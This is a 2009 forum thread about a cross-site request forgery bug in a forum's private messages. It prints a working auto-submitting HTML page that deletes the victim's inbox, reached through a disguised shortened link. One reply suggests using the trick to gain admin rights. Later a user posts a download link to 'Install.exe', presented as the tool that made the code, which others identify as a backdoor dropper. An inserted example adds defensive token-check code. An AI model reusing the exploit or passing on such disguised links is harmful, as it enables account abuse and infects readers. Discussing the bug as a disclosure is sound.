
Danger - don't read this

Posted: Wed Mar 11, 2009 2:46 pm
by efe

I've warned you!

Don't click here: http://bit.ly/dontclickme


Re: Danger - don't read this

Posted: Wed Mar 11, 2009 3:33 pm
by michuber
It deletes all messages in your inbox...

Code:

<html>
  <head>
  </head>
  <body onLoad=javascript:document.xsrf.submit()>

<form action="http://www.hacker.org/forum/privmsg.php?folder=inbox" method="post" 
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">
</form>

</body>
</html>

Posted: Wed Mar 11, 2009 6:39 pm
by m!nus
nice POC. if you make a link like this for an admin you can get yourself admined :P

Posted: Wed Mar 11, 2009 9:12 pm
by efe
adum has just fixed that issue, so you may now safely click the link - and nothing will happen to your PM's !
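
Added example, not part of the thread and not the forum's actual fix (the thread does not say how it was fixed): one common server-side defense is a per-session token that the site's own delete form carries and a cross-site page cannot read. The handler, key, session id and `csrf_token` field name are assumptions for illustration; the other form fields are the ones from the PoC above.

```python
import hashlib
import hmac
import secrets

# Constructed for the example; a real site keeps a stable secret key server-side.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str) -> str:
    """Token the server embeds as a hidden field in its own delete form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_delete_all(session_id, form, inbox):
    """Hypothetical handler: empty the inbox only for a verified request.

    Returns an HTTP-like status code.
    """
    if session_id is None:
        return 403  # not logged in
    supplied = form.get("csrf_token", "")
    expected = issue_token(session_id)
    # Constant-time comparison; a missing or wrong token is rejected.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403
    if form.get("deleteall") == "true" and form.get("confirm") == "Yes":
        inbox.clear()
        return 200
    return 400


# Fields the auto-submitting page sends. The browser attaches the victim's
# session cookie, but the foreign page cannot read the victim's token.
FORGED_FORM = {"mode": "", "deleteall": "true", "confirm": "Yes"}


def demo():
    sid = "constructed-session-id"  # constructed sample value
    inbox = ["pm 1", "pm 2"]        # constructed sample inbox
    forged = handle_delete_all(sid, dict(FORGED_FORM), inbox)
    kept = list(inbox)              # inbox contents after the forged request
    own_form = {**FORGED_FORM, "csrf_token": issue_token(sid)}
    genuine = handle_delete_all(sid, own_form, inbox)
    return forged, kept, genuine, inbox


if __name__ == "__main__":
    print(demo())
```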

Posted: Fri Mar 20, 2009 12:05 am
by Zaffron
What was the point of posting this anyways??

Posted: Fri Mar 20, 2009 2:34 pm
by Chocoholic
Right, seems quite an unsafe way of exposing a vulnerability. Anyways, is this a general phpBB issue? I never liked that piece of s..oftware anyways.

LoL

Posted: Sat Mar 21, 2009 9:45 pm
by tomtomtomtom
This is the program he used to generate the code>>>

http://rapidshare.com/files/211946099/Install.exe.html

Re: LoL

Posted: Sun Mar 22, 2009 2:16 am
by PaRaDoX
tomtomtomtom wrote:This is the program he used to generate the code>>>

http://rapidshare.com/files/211946099/Install.exe.html
don't go cracker on us tomtomtomtom.

Install.exe.html?
INSTALL.EXE? no program name? nothing? that on top of the fact that there's about a 1 in (insert number of rapidshare files here) chance that you'd EVER find that. Tell me the program name, smart guy. :3

Posted: Sun Mar 22, 2009 5:06 am
by plope0726
BackDoor.VB.DMS.dropper

Posted: Sun Mar 22, 2009 5:27 am
by who
sweet!

Posted: Sun Mar 22, 2009 5:50 am
by flamingdragon
Gnarly

Posted: Sun Mar 22, 2009 11:19 pm
by PaRaDoX
plope0726 wrote:BackDoor.VB.DMS.dropper
and who called it? :3


and who are these 2 new guys saying it's sweet? probably mule accounts of his...

sorry, mule is a term used in MMO's. Too used to it :3

Posted: Mon Mar 23, 2009 12:17 am
by plope0726
PaRaDoX wrote:
plope0726 wrote:BackDoor.VB.DMS.dropper
and who called it? :3


and who are these 2 new guys saying it's sweet? probably mule accounts of his...

sorry, mule is a term used in MMO's. Too used to it :3

You did :) Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... :lol:

Posted: Thu Mar 26, 2009 1:44 am
by PaRaDoX
plope0726 wrote:
PaRaDoX wrote:
plope0726 wrote:BackDoor.VB.DMS.dropper
and who called it? :3


and who are these 2 new guys saying it's sweet? probably mule accounts of his...

sorry, mule is a term used in MMO's. Too used to it :3
You did :) Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... :lol:

.....unless they are mules.